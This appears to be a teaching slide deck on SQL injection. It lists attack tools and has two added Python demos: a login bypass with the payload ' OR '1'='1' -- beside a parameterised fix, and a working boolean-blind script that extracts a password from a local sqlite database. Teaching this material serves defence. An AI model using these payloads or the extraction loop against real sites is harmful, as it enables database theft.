2. SQL injection is one of the most common attacks against web
applications.
It is used against websites and applications that build SQL queries
from user input and send them to a database server.
A successful SQL injection attack can read sensitive data,
including email addresses, usernames, passwords (or their hashes)
and credit card details, from your database.
An attacker can not only read, but also modify or delete the data
in the database. So, SQL injection can be very harmful.
3. There are various kinds of SQL injection, classified by their scope
(how the injected query's result reaches the attacker and what else
it is combined with). These are:
Classic SQL injection (the injected query's results are returned directly
in the application's response)
Blind SQL injection (no data is returned; the attacker infers it from
true/false behaviour or response timing)
Database specific SQL injection (relies on features of a particular DBMS)
Compound SQLI (SQL injection combined with another attack, such as XSS
or weak authentication)
4. SQL injection vulnerabilities exist because user input is mixed into the
text of a SQL query without being kept separate from the SQL code. Input
must be validated, and above all passed to the database as bound parameters
of a prepared statement rather than concatenated into the query string.
Developers forget this, or "sanitize" the input incompletely, and that makes
the web application vulnerable to SQL injection attack.
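The following is an added example (not code from the original deck) showing the bug described above beside its fix. It uses Python's standard sqlite3 module with a constructed in-memory users table; the table contents and the login functions are assumptions for illustration only.

```python
import sqlite3

# Constructed sample data for the demo, not from the original deck.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users(username TEXT, password TEXT, email TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
    ("alice", "wonderland", "alice@example.com"),
    ("bob", "builder", "bob@example.com"),
])


def login_vulnerable(username: str, password: str):
    """The bug the slide describes: user input is spliced straight into the
    SQL text, so the input can change the *structure* of the query."""
    sql = (f"SELECT username, email FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(username: str, password: str):
    """Parameterised (prepared) query: the SQL text is fixed and the values
    are bound separately, so a quote character in the input is only data."""
    sql = ("SELECT username, email FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchall()


# Classic tautology payload: '1'='1' is always true and the SQL comment
# marker (--) discards the rest of the WHERE clause, including the
# password check.
PAYLOAD = "' OR '1'='1' --"

if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, "anything"))  # every user
    print("safe:      ", login_safe(PAYLOAD, "anything"))        # no rows
```

With the payload as the username, the vulnerable function returns every user in the table because the query it executes has become `... WHERE username = '' OR '1'='1'`; the parameterised version looks for a user literally named `' OR '1'='1' --` and returns nothing. Escaping quotes by hand ("sanitizing") is fragile across database dialects and encodings; binding parameters removes the problem instead of filtering it.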
To make SQL injection testing easier, tools with increasingly capable
detection engines have been developed, and with every new release they
become smarter. These tools typically take the URL of a suspected
vulnerable page (and the parameter to test) and then detect and exploit
the injection on the target.
5. LIST OF THE BEST SQL INJECTION TOOLS
1. SQLMap - Automatic SQL Injection And Database Takeover Tool
2. jSQL Injection - Java Tool For Automatic SQL Database Injection
3. BBQSQL - A Blind SQL Injection Exploitation Tool
4. NoSQLMap - Automated NoSQL Database Pwnage
5. Whitewidow - SQL Vulnerability Scanner
6. DSSS - Damn Small SQLi Scanner
7. explo - Human And Machine Readable Web Vulnerability Testing Format
8. Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting
6. SQLMAP
SQLMap is an open source SQL injection tool and the most popular of all
the SQL injection tools available. It makes it easy to exploit a SQL
injection vulnerability in a web application and take over the database
server. It comes with a powerful detection engine that can detect most
SQL injection vulnerabilities.
It supports a wide range of database servers, including MySQL, Oracle,
PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB, so most of the popular
database servers are already covered. It also supports the main SQL
injection techniques: boolean-based blind, time-based blind, error-based,
UNION query-based, stacked queries and out-of-band.
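The boolean-based blind technique listed above (and the "Blind SQL injection" category from slide 3) is the one whose mechanics are least obvious from the description, so here is an added example, not code from the deck or from the sqlmap project, of what such a tool automates. It uses Python's sqlite3 module with a constructed in-memory database; the vulnerable endpoint, table names and the secret value are assumptions for illustration. The attacker never sees query output, only whether the page says "found" or "not found", and still recovers the secret one character at a time.

```python
import sqlite3

# Constructed sample database (not from the original deck): an items table
# the endpoint is meant to query and a users table the attacker wants to read.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE items(id INTEGER PRIMARY KEY, name TEXT, public INTEGER);
INSERT INTO items VALUES (1, 'widget', 1), (2, 'gadget', 0);
CREATE TABLE users(name TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cr3t-Pa55');
""")


def item_is_visible(item_id: str) -> bool:
    """Deliberately vulnerable endpoint: item_id is interpolated into the
    query. The caller only learns True/False (a normal page vs. a
    'not found' page), which is exactly the boolean-based blind situation."""
    sql = f"SELECT id FROM items WHERE id = {item_id} AND public = 1"
    return conn.execute(sql).fetchone() is not None


def binary_search(subquery: str, lo: int, hi: int) -> int:
    """Return the integer n in [lo, hi) such that the injected condition
    '(subquery) > mid' is True for mid < n and False for mid >= n.
    Each probe costs one request, so a value below 2**k needs k probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if item_is_visible(f"1 AND ({subquery}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(column: str = "password", user: str = "admin") -> str:
    """Recover a string from the users table using only the True/False
    oracle: first its length, then the code point of each character.
    This is the loop that sqlmap's boolean-based blind technique automates
    (sqmap also tunes the comparison and handles non-ASCII; this demo
    assumes ASCII)."""
    where = f"FROM users WHERE name = '{user}'"
    length = binary_search(f"SELECT length({column}) {where}", 0, 256)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(
            f"SELECT unicode(substr({column}, {pos}, 1)) {where}", 0, 128)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print("baseline:", item_is_visible("1"), item_is_visible("2"))
    print("recovered through the boolean oracle:", extract_secret())
```

Each character needs about seven requests, so even a short secret means dozens of near-identical requests that differ only in the injected comparison; that request pattern (and the `AND (SELECT ...) > N` shape) is what to look for in web server logs when hunting for blind injection attempts. Time-based blind works the same way, with a deliberate delay (for example a sleep function in the DBMS) standing in for the True branch when the page content does not change at all.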
7. One good feature of the tool is its built-in password hash recognition:
it identifies the format of password hashes it dumps from the database and
can then try to crack them with a dictionary attack.
After connecting to a database server, the tool also lets you search by
name for specific databases, tables or columns across the whole database
server.
8. A successful SQL injection attack can read sensitive data such as
passwords, email addresses and usernames from the server's database.
SQL injection can be very harmful.
9. Respect the privacy of others.
Think before you type.
With great power comes great responsibility.